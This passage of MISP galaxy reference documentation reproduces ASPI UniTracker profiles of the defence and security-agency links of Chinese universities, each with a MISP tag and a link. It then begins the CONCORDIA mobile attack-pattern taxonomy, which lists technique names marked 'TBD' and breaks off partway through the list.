Soochow University has been jointly supervised by the Jiangsu Provincial Government and defence industry agency SASTIND since 2016. This arrangement is designed to expand the university’s involvement in defense-related research and training. The university has five designated defence disciplines, centred around research on radiation. In particular, its School of Radiation Medicine and Protection has strong defence links, as it has become a major teaching and research base for the nuclear industry. Suzhou University is also involved in promoting military-civil fusion. The university cooperated with Changfeng Science Technology Industry Group (a subsidiary of missile manufacturer CASC) and Suzhou Xinkuan Electronic Technology Co., Ltd. to jointly establish the ‘Suzhou University Military-Civil Fusion Internet of Things Collaborative Innovation Center.’

The tag is: misp-galaxy:china-defence-universities="Soochow University (苏州大学)"

Table 955. Table References

Links

https://unitracker.aspi.org.au/universities/soochow-university

South China University of Technology (华南理工大学)

SCUT is subordinate to the Ministry of Education and in 2018 was placed under a joint-construction agreement between the MOE and SASTIND. This arrangement is designed to develop the university’s involvement in defence-related research and training. SCUT also holds secret-level security credentials, allowing it to participate in research and production for classified weapons and defence technology projects. As a result of the university’s placement under joint construction and its secret-level security credentials, SCUT’s involvement in defence research is likely to grow in coming years. Since 2008, the university has hosted a defence research laboratory on materials science. The lab was initially run by the university’s president. In 2017, the university joined the Guangzhou Civil-Military Integration Industry Coalition. More recently, in 2019, SCUT and iFlytek established an artificial intelligence company, Guangzhou Huanan Naokong Zhineng Keji Gongsi (广州华南脑控智能科技公司).

The tag is: misp-galaxy:china-defence-universities="South China University of Technology (华南理工大学)"

Table 956. Table References

Links

https://unitracker.aspi.org.au/universities/south-china-university-of-technology

Southeast University (东南大学)

SEU is a leading Chinese university that engages in high levels of defence research. In 2015, the university undertook RMB180m (AUD37m) of defence research projects, placing it among the Ministry of Education universities most involved in defence research. That figure has almost certainly grown since 2016, when SEU came under a ‘joint construction’ agreement between the Ministry of Education and defence industry agency SASTIND. The university has secret security credentials, enabling it to participate in secret defence projects. The university has also been linked to cyberespionage. Researchers at its School of Cyber Science and Engineering (网络空间安全学院) have been funded by the MSS, China’s civilian intelligence agency. The School of Cyber Science and Engineering has close ties to TopSec, a Chinese information security company that trains, recruits and works with PLA cyber security officers. SEU states that its defence research relies on its excellence in electronics. It has at least two laboratories that specialise in defence research on navigation technology and underwater acoustics. Both laboratories may be involved in developing technology for underwater warfare. Representatives from the PLA Navy’s Submarine Academy visited SEU in 2017. SEU has also built relationships with state-owned defence conglomerates. In 2017, the university signed a strategic cooperation agreement with missile-manufacturer China Aerospace Science and Industry Corporation. In 2018 and 2019, it signed similar agreements with subsidiaries of China Electronics Technology Group Corporation, China’s leading manufacturer of military electronics.

The tag is: misp-galaxy:china-defence-universities="Southeast University (东南大学)"

Table 957. Table References

Links

https://unitracker.aspi.org.au/universities/southeast-university

Southwest University of Science and Technology (西南科技大学)

SWUST is deeply engaged in defence research and is based in Mianyang, a city also home to China’s nuclear weapons program and many other parts of the defence industry. Since 2006, the university has been subject to several joint construction agreements between the Sichuan Provincial Government and SASTIND that are designed to increase its involvement in defence research. SWUST carries out defence-related research on nuclear waste, radiation protection and electronic information engineering. It holds secret-level security credentials, allowing it to undertake classified defence technology and weapons projects. The university’s main defence laboratory carries out research on topics such as the use of microorganisms to clean nuclear waste. SWUST has worked closely with the Chinese Academy of Engineering Physics (China’s nuclear warheads program), China Aerodynamics Research and Development Center (a PLA base specialising in aircraft design), and defence conglomerates since its establishment. The fact that the university hosts the province’s ‘Civil-military Integration Institute’ is a testament to its integration with the military and defence industry.

The tag is: misp-galaxy:china-defence-universities="Southwest University of Science and Technology (西南科技大学)"

Table 958. Table References

Links

https://unitracker.aspi.org.au/universities/southwest-university-of-science-and-technology

Space Engineering University (中国人民解放军战略支援部队航天工程大学)

SEU was established in June 2017 as an expansion of the former PLA Equipment Academy (装备学院). SEU describes itself as a ‘comprehensive university that trains talents for space command management and engineering.’ It is intended to serve as the ‘cradle of the new PLA’s space talent training.’ The SEU is subordinate to and supports the PLA Strategic Support Force’s Space Systems Department (航天系统部), which has taken over the space and potentially counterspace capabilities that were previously the purview of the former General Armaments Department and, to a lesser degree, the former General Staff Department. The SEU offers degree programs at the undergraduate, master’s, and doctoral levels, as well as programs for non-commissioned officers, across disciplines including space target surveillance, remote sensing science and technology, and aerospace information security. Its faculty include nine CMC Science and Technology Commission experts and twenty professors who are designated as expert defence science and technology advisors. Beyond its mission of talent cultivation, the SEU also engages in extensive research. In particular, the SEU has a total of eighteen laboratories, which include two national-level key laboratories and one military-level key laboratory.

The tag is: misp-galaxy:china-defence-universities="Space Engineering University (中国人民解放军战略支援部队航天工程大学)"

Table 959. Table References

Links

https://unitracker.aspi.org.au/universities/space-engineering-university

Special Police Academy (中国武装警察部队特种警察学院)

SPA is made up of departments for training, political work and logistics. As such, SPA engages in little defence research and focusses its activities on training special operations paramilitary troops in command processes.

The tag is: misp-galaxy:china-defence-universities="Special Police Academy (中国武装警察部队特种警察学院)"

Table 960. Table References

Links

https://unitracker.aspi.org.au/universities/special-police-academy

Sun Yat-sen University (中山大学)

SYSU is a leading Chinese university subordinate to the Ministry of Education. In 2018, it came under the joint supervision of the MOE and defence industry agency SASTIND. This development indicates that SYSU’s involvement in the defence industry and defence research is growing. The university has a large defence research budget. In 2018, it spent nearly RMB200 million (AUD41 million) on defence research out of its total research budget of RMB3.1 billion (AUD640 million). SYSU is linked to the Chinese military through its National Supercomputer Center in Guangzhou (国家超级计算广州中心), which was placed on the US Government Entity List in 2015 for its role in nuclear weapons development. The centre was jointly established with the PLA National University of Defense Technology in 2011 to host the Tianhe-2 supercomputer. The supercomputer is operated by the National University of Defense Technology and was the world’s fastest from 2013 to 2015. Aside from the supercomputer center, SYSU’s Key Laboratory of Information Science is the only known lab focused on defence research and is located within the School of Electronics and Information Technology. In 2010, the university established a State Secrets Academy (国家保密学院), becoming the third university in China to establish such an institute in partnership with China’s National Administration of State Secrets Protection (国家保密局). The Institute carries out research and training on the protection of state secrets.

The tag is: misp-galaxy:china-defence-universities="Sun Yat-sen University (中山大学)"

Table 961. Table References

Links

https://unitracker.aspi.org.au/universities/sun-yat-sen-university

Tianjin Polytechnic University (天津工业大学)

TJPU is known for its research in the field of textile science and engineering. It is jointly supervised by the Ministry of Education and the city of Tianjin. In 2018, defence industry agency SASTIND and the Tianjin Municipal Government signed an agreement to jointly support TJPU. The purpose of the agreement is to support the university’s development of defence disciplines, construction of defence laboratories, and training of defence scientists. Through this arrangement, SASTIND involves universities in military research projects and supports collaboration between universities and the defence industry. The university also holds secret-level security credentials that allow it to participate in classified defence technology projects. Tianjin Polytechnic University hosts one state key lab and two MOE key labs. One of the MOE key labs and the state key lab are located within the School of Material Science and Engineering. Additionally, TJPU’s School of Textile Science and Engineering has conducted R&D that has been applied to industries in aerospace, defense, transportation and civil engineering, among others. The School of Textile Science and Engineering has reportedly become a backbone of research and innovation for China’s textile industry.

The tag is: misp-galaxy:china-defence-universities="Tianjin Polytechnic University (天津工业大学)"

Table 962. Table References

Links

https://unitracker.aspi.org.au/universities/tianjin-polytechnic-university

Tianjin University (天津大学)

TJU is under the administration of the Ministry of Education and has also been supervised by defence industry agency SASTIND since 2012. The university has second-class security credentials, allowing it to participate in classified research projects at the level of ‘secret’. It hosts two defence laboratories, working on optoelectronics and propellants. In 2015, a professor at Tianjin University was arrested by U.S. federal agents and accused of economic espionage and technology theft. He had been a professor in the School of Precision Instrument and Opto-electronics Engineering, which is home to one of the MOE labs involved in defense research. TJU is also a member of several international engineering alliances and has one National Defense Technology Innovation Team. TJU carries out research for the Ministry of State Security (MSS), China’s civilian intelligence agency. It has hosted at least one MSS researcher and its scientists have been awarded for their work for the MSS on communication and information engineering.

The tag is: misp-galaxy:china-defence-universities="Tianjin University (天津大学)"

Table 963. Table References

Links

https://unitracker.aspi.org.au/universities/tianjin-university

Tongji University (同济大学)

Tongji University is recognized for its work in architecture, civil engineering, marine geology, and transportation engineering. The university established the only state key laboratory of deep-sea geology, which plays an important role in China’s deep-sea observation and serves as a significant platform for the country’s marine strategy. The university’s involvement in marine research likely stems from its joint construction with the State Oceanic Administration (SOA). In 2010, the Ministry of Education and the State Oceanic Administration signed an agreement to jointly establish 17 universities, a collaboration aimed at enhancing the ability to cultivate marine talents in universities, develop marine science and technology, and make contributions to the development of China’s marine industry. Tongji University has secret-level security credentials and is home to one Ministry of Education laboratory dedicated to defense research. In April 2019, the university was placed on the U.S. Unverified List, which places restrictions on US exports to the university. Entities are added to the Unverified List if the US Government is unable to satisfactorily carry out end-user checks on them to ensure compliance with export licenses.

The tag is: misp-galaxy:china-defence-universities="Tongji University (同济大学)"

Table 964. Table References

Links

https://unitracker.aspi.org.au/universities/tongji-university

Tsinghua University (清华大学)

Tsinghua University is considered China’s leading university in science and technology. Often characterized as ‘China’s MIT,’ Tsinghua is highly ranked globally, while also being the alma mater of numerous Chinese leaders, including Xi Jinping. Tsinghua has been included in numerous Chinese educational initiatives, including acting as a Class A institution in the Double First-Class University Plan and with membership in China’s C9 League. As of spring 2018, Tsinghua University had 390 research institutions operating across a range of fields. Tsinghua engages in a range of military research and was awarded secret-level security credentials for classified research in 2007. In advancing military-civil fusion, Tsinghua also continues its ‘fine tradition’ of serving China’s national security and defense, actively creating new platforms and initiatives to support this strategy. Not only its dedicated defence laboratories but also a range of key laboratories and research institutions at the university have received funding from the military. Since at least 2012, Tsinghua has also been jointly supervised by defence industry agency SASTIND as part of a program to deepen its defence research and links to the defence sector. Tsinghua’s defence research covers areas such as artificial intelligence, air-to-air missiles, navigation technology, instrument science and materials science. The university trains students for China’s nuclear weapons program, military and defence industry. In 2014 it signed a strategic cooperation agreement with the Chinese Academy of Engineering Physics (CAEP)—China’s nuclear weapons program. In 2016, CAEP’s Materials Institute and Tsinghua established a joint postgraduate training base for teaching, research collaboration and equipment sharing. Approximately 200 postgraduate students at Tsinghua are sponsored by CAEP or defence industry conglomerates each year through the Chinese government’s National Defence Science and Technology Scholarship program. Scholarship recipients are required to work for their sponsoring organisation for five years after graduating. Roughly 2000 of the scholarships are awarded each year, indicating that Tsinghua students are among the primary recipients of them. Documents published by Tsinghua indicate that CAEP planned to sponsor 40 PhD students to study nuclear technology in 2013. CAEP continues to sponsor Tsinghua postgraduates. In 2004, Tsinghua agreed to supervise doctoral students from the PLA’s Second Artillery Engineering University, now known as the Rocket Force University of Engineering.

The tag is: misp-galaxy:china-defence-universities="Tsinghua University (清华大学)"

Table 965. Table References

Links

https://unitracker.aspi.org.au/universities/tsinghua-university

University of Electronic Science and Technology of China (电子科技大学)

UESTC was established in 1961 as one of China’s first defence industry universities. It is now subordinate to the Ministry of Education (MOE) and is also jointly supervised by defence industry agencies MIIT and SASTIND, as well as the Chinese military’s leading electronics manufacturer, China Electronics Technology Group Corporation (CETC). The university is one of China’s leading universities for defence electronics research. It claims to rank among the top MOE universities in terms of the scale of its defence research. Between 2011 and 2015, its annual spending on defence research grew by 210% to RMB400 million (AUD80 million) and may account for as much as 32% of its overall research spending. 16.43% of UESTC graduates in 2017 who found employment were working in the defence sector. UESTC gained secret-level security credentials about a decade ago, probably in 2006, making it one of the first MOE universities to hold them. UESTC research has been used by state-owned manufacturers of military aircraft, missiles, and military electronics and the PLA Navy on projects such as the JF-17 fighter and the Navy’s aircraft carrier program. UESTC’s defence research covers areas including electronics, microwaves, terahertz technology, anti-jamming technology and signal processing, communication systems, military-use critical materials, and optoelectric imaging. Between 2001 and 2005, UESTC undertook over 900 military electronics projects worth in excess of RMB500 million (AUD104 million). UESTC’s research on artificial intelligence has attracted scrutiny for its human rights implications. In 2015, a professor recruited by UESTC through the Thousand Talents Plan established a company called Koala AI. The company produces artificial intelligence surveillance systems that are used in Xinjiang, where an estimated 1.5 million Uyghurs and other ethnic minorities have disappeared into concentration camps. UESTC has close relationships with the Chinese defence industry. The university operates a national laboratory on high-power radiation with the Chinese Academy of Engineering Physics, the PRC’s primary nuclear warhead research complex. CETC, a state-owned defence conglomerate, partnered jointly with the MOE to develop UESTC’s capabilities. Under the arrangement, UESTC agreed to expand its collaboration with CETC, help train CETC personnel and send its best students to work at CETC. Defence industry agency SASTIND also signed agreements to supervise UESTC in 2008 and 2016.

The tag is: misp-galaxy:china-defence-universities="University of Electronic Science and Technology of China (电子科技大学)"

Table 966. Table References

Links

https://unitracker.aspi.org.au/universities/university-of-electronic-science-and-technology-of-china

University of International Relations (国际关系学院)

UIR claims it was established in 1949 under the direction of then Premier Zhou Enlai. In 1964 it was designated as a ‘national key university’, and this appears to be the evidence it uses to claim it is a Ministry of Education university. However, the university does not appear on the Ministry of Education’s list of subordinate universities. Individuals formerly and presently affiliated with the university have also held affiliations with the MSS or the MSS-linked think tank the China Institutes of Contemporary International Relations (中国现代国际关系研究院). They include Geng Huichang (耿惠昌), a former Minister of State Security (2007-2016) and vice minister of State Security (1998-2007). Prior to this he was the head of China Institutes of Contemporary International Relations from 1992 to 1998. From 1990 to 1992, he was the director of UIR’s American Research Department and from 1985-1990 he was deputy director of the American Research department. Notably, current UIR President Tao Jian is also a former CICIR vice-president and a UIR graduate. UIR gives the MSS a way to work with foreign universities and academics to shape and learn about perceptions of the PRC’s views on security. It also provides a platform for the MSS to identify talent, recruit officers and collect intelligence. The university’s Hangzhou campus, also known as the Zhejiang Second People’s Police School, may carry out more practical training of MSS officers and has been described on a local government website as ‘specialising in training special talent’. Some graduates of the Hangzhou campus have moved straight into MSS positions. The Hangzhou campus works closely with Zhejiang University on teaching and research.

The tag is: misp-galaxy:china-defence-universities="University of International Relations (国际关系学院)"

Table 967. Table References

Links

https://unitracker.aspi.org.au/universities/university-of-international-relations

University of Science and Technology Beijing (北京科技大学)

USTB is a leading university subordinate to the MOE. The university engages in high levels of defence research and claims to be among the top MOE universities for defence spending. Since 2018, it has been under a joint-construction agreement between the MOE and defence industry agency SASTIND that is designed to expand its involvement in defence research. USTB is known as the ‘cradle of steel’ for its training and research on metallurgy. The university’s defence research appears to focus on metallurgy and materials science. It hosts at least three laboratories dedicated to defence research, including two that are jointly run with state-owned defence conglomerates. The head of USTB’s Institute of Advanced Materials and Technology also heads a SASTIND-supported defence science and technology innovation team. The university holds secret-level security credentials, allowing it to participate in research and production for classified weapons and defence technology projects.

The tag is: misp-galaxy:china-defence-universities="University of Science and Technology Beijing (北京科技大学)"

Table 968. Table References

Links

https://unitracker.aspi.org.au/universities/university-of-science-and-technology-beijing

University of Science and Technology of China (中国科学技术大学)

The University of Science and Technology of China is among China’s most prestigious universities in science and technology. Uniquely, it was established and is supervised by the Chinese Academy of Sciences, intended to serve national objectives in science and technology. Xi Jinping personally inspected USTC in 2016, urging it to pursue “even more outstanding achievements in teaching and innovation.” It is a member of the C9 League and in the “211 Project” and “985 Project.” While providing undergraduate and graduate-level education, USTC is also highly active in research across a number of major laboratories, including several that support research that is related to national defense and the development of dual-use technologies, such as brain-inspired approaches to artificial intelligence and quantum information science. USTC has a long history of contributions to science in the service of the state, and it has recently sought to deepen its contributions to military research, including through establishing a new center for military-civil fusion. Several USTC professors, including prominently Pan Jianwei, have partnered with the defense industry to pursue military applications of their technologies.

The tag is: misp-galaxy:china-defence-universities="University of Science and Technology of China (中国科学技术大学)"

Table 969. Table References

Links

https://unitracker.aspi.org.au/universities/university-of-science-and-technology-of-china

University of Shanghai for Science and Technology (上海理工大学)

USST describes itself as a ‘university with defence characteristics’. It has been under the joint supervision of Shanghai and defence industry agency SASTIND since 2016. It is engaged in growing levels of defence research and holds second-class weapons research and development secrecy credentials, allowing it to undertake classified projects. In 2017, its spending on defence research reached RMB13 million (AUD2.6 million). SASTIND has designated areas within the fields of optics, energy and control science as defence disciplines at USST, indicating that the university’s defence research focuses on these areas. In 2017, the university established a joint venture on terahertz radiation technology with subsidiaries of defence conglomerate Norinco Group.

The tag is: misp-galaxy:china-defence-universities="University of Shanghai for Science and Technology (上海理工大学)"

Table 970. Table References

Links

https://unitracker.aspi.org.au/universities/university-of-shanghai-for-science-and-technology

University of South China (南华大学)

USC specialises in nuclear engineering. It has a well-developed defence research program and has been the subject of several joint-construction agreements between the Hunan Provincial Government and defence industry agency SASTIND since 2002. These agreements are designed to ‘support USC in going a step further to display its defence characteristics based on the development needs of the defence technology industry.’ USC is also supervised by China National Nuclear Corporation, a state-owned defence nuclear engineering conglomerate. USC carries out large amounts of defence research related to nuclear engineering, as well as work on information technology, communications engineering, control engineering and electrical engineering. The university received secret-level security credentials in 2008, allowing it to work on classified defence projects.

The tag is: misp-galaxy:china-defence-universities="University of South China (南华大学)"

Table 971. Table References

Links

https://unitracker.aspi.org.au/universities/university-of-south-china

Wuhan University (武汉大学)

WHU is a leading Chinese university subordinate to the Ministry of Education. The university has close ties to the military and has been subject to a joint-supervision agreement between the Ministry of Education and defence industry agency SASTIND since 2016, an arrangement designed to increase its involvement in defence research. In 2015, WHU planned to spend RMB200 million (AUD42 million) on defence research for the year and described itself as ‘a university with a strong reputation in the defence science and technology field’. WHU carries out defence research in a wide range of fields, including navigation, computer simulation, electronic information, electromagnetics, aerospace remote sensing, materials science, cyber security and explosions. The university is an important site of research for China’s Beidou satellite navigation system. Aside from being involved in defence research, there are strong indications that WHU has carried out cyber attacks for the People’s Liberation Army. One of the university’s two defence laboratories purportedly established by the Ministry of Education, the Key Laboratory of Aerospace Information Security and Trusted Computing, has been accused by unnamed US and Taiwanese officials of carrying out cyberattacks.

The tag is: misp-galaxy:china-defence-universities="Wuhan University (武汉大学)"

Table 972. Table References

Links

https://unitracker.aspi.org.au/universities/wuhan-university

Wuhan University of Technology (武汉理工大学)

WHUT is subordinate to the Ministry of Education. The university originally specialised in research relating to construction, transport and automobiles. It engages in high levels of defence research and has been under a ‘joint-construction’ agreement between the Ministry of Education and defence industry agency SASTIND since 2016. It holds secret-level security credentials. The university hosts two Ministry of Education laboratories dedicated to defence research on materials science and ship technology. WHUT also works closely with the PLA Air Force on defensive engineering such as the construction of aircraft bunkers and underground shelters. Since 2001, WHUT and the Guangdong Military Region Air Force Engineering and Construction Bureau have run a joint research institute, which ‘takes advantage of [WHUT’s] State Key Laboratory of Advanced Technology for Materials Synthesis and Processing’. ‘In 2012, the PLA Air Force Logistics Department and WHUT held a signing ceremony inaugurating the “Air Force-level Military-Civil Fusion Air Defence Engineering Construction Technology Innovation Platform Cooperation Agreement” (空军级军民融合式空防工程建设科技创新平台合作协议)’. The same department in cooperation with WHUT also jointly established the Air Force Air Defence Engineering Construction Technology Innovation Platform (空军级空防工程建设科技创新平台), with ‘the goal of innovating mutually beneficial technologies.’

The tag is: misp-galaxy:china-defence-universities="Wuhan University of Technology (武汉理工大学)"

Table 973. Table References

Links

https://unitracker.aspi.org.au/universities/wuhan-university-of-technology

Xi’an Jiaotong University (西安交通大学)

XJTU is subordinate to the Ministry of Education. It is also supervised by SASTIND as part of a program to develop defense research capabilities within Chinese universities. The university describes its strategy as being ‘based in Shaanxi, geared toward the needs of the nation, and serving the national defense industry.’ The university is advanced in its implementation of military-civil fusion and has established strategic partnerships with China Aerospace Science and Technology Corporation, China Aerospace Science and Industry Corporation, and the Aero Engine Corporation of China. It holds secret-level security credentials, allowing it to participate in classified defence technology projects.

The tag is: misp-galaxy:china-defence-universities="Xi’an Jiaotong University (西安交通大学)"

Table 974. Table References

Links

https://unitracker.aspi.org.au/universities/xian-jiaotong-university

Xi’an Technological University (西安工业大学)

XATU is a civilian university that primarily engages in defence research. XATU describes itself as ‘having distinct defence-industrial characteristics’ and is heavily involved in weapons development. Since 2016, it has been subject to a ‘joint construction’ agreement between the Shaanxi Provincial Government and defence industry agency SASTIND designed to deepen its defence links. The university’s main areas of defence research include photoelectric imaging technology, manufacturing technology, materials science, detection and measurement technology and weapons systems. It holds secret-level security credentials. XATU is a member of the B8 Cooperation Innovation Alliance (B8协同创新联盟 or 中国兵器协同创新联盟), a group of eight Chinese research institutions that specialize in weapons science—the ‘B’ in ‘B8’ stands for the Chinese word for armaments, bingqi (兵器). Apart from Shenyang Ligong University, XATU is the only Chinese civilian university known to be supervised by state-owned arms manufacturers China North Industries Group (Norinco Group) and China South Industries Group.

The tag is: misp-galaxy:china-defence-universities="Xi’an Technological University (西安工业大学)"

Table 975. Table References

Links

https://unitracker.aspi.org.au/universities/xian-technological-university

Xi’an University of Posts and Telecommunications (西安邮电大学)

XUPT is a leading Chinese university supervised by the Shaanxi Provincial Government and the Department of Information Technology. The university was established in 1959 as an institution focused on communications and information technology. XUPT retains a focus on these disciplines to this day. XUPT’s faculties include colleges focusing on artificial intelligence, automation, cyber security and electrical engineering. XUPT maintains close links to China’s Ministry of Public Security (MPS). The university has signed agreements and established joint laboratories with the MPS’s local counterparts. In November 2013, XUPT partnered with the Shaanxi Municipal Government’s public security ministry to establish the MPS Key Laboratory of Electronic Information Application Technology for Scene Investigation (公安部电子信息现场勘验应用技术重点实验室). This was the first such joint laboratory that the MPS established with a university in any of China’s five north-western provinces. XUPT partnered with Xi’an’s Yanta District Public Security Bureau branch in November 2018, establishing the ‘Joint Laboratory for Smart Public Security Information Analysis and Applications’ (公安信息智能分析及应用联合实验室). The joint laboratory develops applications of artificial intelligence for analysing criminal information.

The tag is: misp-galaxy:china-defence-universities="Xi’an University of Posts and Telecommunications (西安邮电大学)"

Table 976. Table References

Links

https://unitracker.aspi.org.au/universities/xian-university-of-posts-and-telecommunications

Xiamen University (厦门大学)

XMU is one of China’s leading universities, but it does not appear to engage in high levels of defence research. However, in 2018 it came under a joint supervision agreement between the Ministry of Education, the Fujian Provincial Government and defence industry agency SASTIND that indicates XMU will expand its involvement in defence research. The arrangement is designed to ‘upgrade the university’s ability to innovate defence science and technology and actively integrate itself with the development of military-civil fusion.’ In 2017, XMU allegedly conspired with Huawei to steal trade secrets from CNEX Labs Inc., an American semiconductor startup. CNEX claims that Huawei and XMU engaged in a multiyear conspiracy to steal the company’s solid-state drive computer storage technology. The university appears to be involved in the development of military-use heavy-duty coatings. In 2017, XMU, Fujian Normal University, Fujian Liheng Paint Co. Ltd. (福建立恒涂料有限公司) and People’s Liberation Army Unit 63983 jointly established the Haixi Liheng New Materials Research Institute (海西立恒新材料研究院). Fujian Liheng Paint specialises in heavy-duty coatings for warships and holds confidential-level security credentials, allowing it to participate in classified defence projects.

The tag is: misp-galaxy:china-defence-universities="Xiamen University (厦门大学)"

Table 977. Table References

Links

https://unitracker.aspi.org.au/universities/xiamen-university

Xiangtan University (湘潭大学)

XTU is a university in Chairman Mao Zedong’s hometown that has substantially expanded its participation in defence research in recent years. It has been subject to two ‘joint construction’ agreements between the Hunan Provincial Government and defence industry agency SASTIND that are designed to help the university ‘draw out its national defence characteristics’. In the university’s own words, its ‘military-civil fusion characteristics are becoming clearer with each day’, and it increased its spending on military-related projects by 60% from 2017 to 2018, spending over RMB31 million (AUD6 million) in 2018. XTU’s defence research covers areas including materials science, energy, measurement technology and electromagnetic waves. The university has developed partnerships with a major PLA nuclear technology research institution, Northwest Institute of Nuclear Technology, and several defence companies, including subsidiaries of arms manufacturer Norinco Group and defence aviation conglomerate Aero Engine Corporation of China. XTU holds secret-level security credentials, allowing it to participate in classified defence technology projects.

The tag is: misp-galaxy:china-defence-universities="Xiangtan University (湘潭大学)"

Table 978. Table References

Links

https://unitracker.aspi.org.au/universities/xiangtan-university

Xidian University (西安电子科技大学)

Xidian University is among China’s top universities for research on antennas, radar, electronic countermeasures and computer science. The university is subordinate to the Ministry of Education and is also jointly supervised by defence industry agency SASTIND and defence electronics conglomerate CETC. It claims it has ‘made important contributions to military modernisation’. The university is closely tied to China’s defense industry and the PLA. It runs at least five defence laboratories and partners with the PLA’s signals intelligence organization. Xidian appears to be an important training ground for Chinese military hackers. According to Xidian’s party secretary, the university has had an ‘unbreakable bond with secret intelligence work since its beginning’. It also holds secret-level security credentials that allow it to work on classified weapons projects.

The tag is: misp-galaxy:china-defence-universities="Xidian University (西安电子科技大学)"

Table 979. Table References

Links

https://unitracker.aspi.org.au/universities/xidian-university

Yanshan University (燕山大学)

The university was formed as an offshoot of Harbin Institute of Technology, one of China’s top defence universities, in 1960. The university continues to prioritise defence research and is jointly supervised by the Hebei Provincial Government together with the Ministry of Education, Ministry of Industry and Information Technology and defence industry agency SASTIND. YSU’s Defense Science and Technology Institute was established in 2006 under the support of COSTIND (a defence industry agency that has been replaced by SASTIND) to expand and oversee defence research at the university. The institute has driven the university’s involvement in space-related defence research through the establishment of laboratories such as the Key Laboratory of Fundamental Science of Mechanical Structure and Materials Science Under Extreme Conditions. Four fields of research at YSU are officially designated as defence disciplines: control theory and control science, electrical circuits and systems, mechanical design and theory, and materials science and engineering. The university holds secret-level security credentials.

The tag is: misp-galaxy:china-defence-universities="Yanshan University (燕山大学)"

Table 980. Table References

Links

https://unitracker.aspi.org.au/universities/yanshan-university

Yunnan Normal University (云南师范大学)

YNNU is a Chinese university subordinate to the Yunnan Provincial Government. Since 2013 it has also been supervised by the Ministry of Education. The university has been focused on training teachers since its inception as the Kunming Teachers College (昆明示范学院) in 1950. YNNU now has a broader focus on a variety of humanities, social and natural science disciplines. YNNU is organised into numerous faculties, some of which are relevant for communist party cadre training:

The tag is: misp-galaxy:china-defence-universities="Yunnan Normal University (云南师范大学)"

Table 981. Table References

Links

https://unitracker.aspi.org.au/universities/yunnan-normal-university

Zhejiang University (浙江大学)

ZJU is subordinate to the Ministry of Education and jointly constructed with defence industry agency SASTIND. This arrangement with SASTIND began in 2016 and is designed to deepen the university’s involvement in defence research. The university holds secret-level security credentials, allowing it to work on classified military projects. The university’s total research funding amounted to RMB4.56 billion (AUD940 million) in 2018. It has at least three defence laboratories, with one source claiming that the university had ten key national laboratories (国家重点实验室) as of 2015. These laboratories are involved in research on computer simulations, high-performance computing and control science. The university also carries out cyber security research and receives funding for this work from the MSS, China’s civilian intelligence agency. ZJU cooperates extensively with international universities and companies, with upwards of 40 international joint S&T research labs. The College of Electrical Engineering has joint labs with U.S. companies in key industries, such as Rockwell Automation in the field of information technology, and the National Semiconductor Corporation. Additionally, the university has a joint research lab with U.S. company Microsoft.

The tag is: misp-galaxy:china-defence-universities="Zhejiang University (浙江大学)"

Table 982. Table References

Links

https://unitracker.aspi.org.au/universities/zhejiang-university

CONCORDIA Mobile Modelling Framework - Attack Pattern

A list of Techniques in CONCORDIA Mobile Modelling Framework.

CONCORDIA Mobile Modelling Framework - Attack Pattern is a cluster galaxy available in JSON format at this location. The JSON format can be freely reused in your application or automatically enabled in MISP.
authors

Bernardo Santos, OsloMet (Norway) - Prof. Dr. Thanh van Do, Telenor Research (Norway) - Luis Barriga, Ericsson AB (Sweden) - Prof. Boning Feng, OsloMet (Norway) - Van Thuan Do, Wolffia AS (Norway) - Bruno Dzogovic, OsloMet (Norway) - Niels Jacot, Wolffia AS (Norway)

Active Scanning

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Active Scanning"

Gather UE Identity Information

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Gather UE Identity Information"

Gather UE Network Information

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Gather UE Network Information"

Phishing for Information

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Phishing for Information"

Social Media Reports

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Social Media Reports"

Develop Capabilities

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Develop Capabilities"

Obtain Capabilities

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Obtain Capabilities"

Stage Capabilities

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Stage Capabilities"

Compromise Accounts

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Compromise Accounts"

Acquire Infrastructure

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Acquire Infrastructure"

Compromise Infrastructure

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Compromise Infrastructure"

Exploit Public-Facing Application

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Exploit Public-Facing Application"

Malicious App from App Store

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Malicious App from App Store"

Malicious App from Third Party

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Malicious App from Third Party"

Masquerade as Legitimate Application

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Masquerade as Legitimate Application"

Exploit via Charging Station or PC

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Exploit via Charging Station or PC"

Exploit via Radio Interfaces

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Exploit via Radio Interfaces"

Rogue Cellular Base Station

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Rogue Cellular Base Station"

Insider attacks and human errors

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Insider attacks and human errors"

Trusted Relationship

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Trusted Relationship"

Supply Chain Compromise

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Supply Chain Compromise"

Native Code

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Native Code"

Scheduled Task/Job

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Scheduled Task/Job"

Command-Line Interface

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Command-Line Interface"

Command and Scripting Interpreter

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Command and Scripting Interpreter"

Boot or Logon Autostart Execution

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Boot or Logon Autostart Execution"

Foreground Persistence

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Foreground Persistence"

Modify Cached Executable Code

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Modify Cached Executable Code"

Compromise Application Executable

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Compromise Application Executable"

Modify OS Kernel or Boot Partition

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Modify OS Kernel or Boot Partition"

Event Triggered Execution

TBD

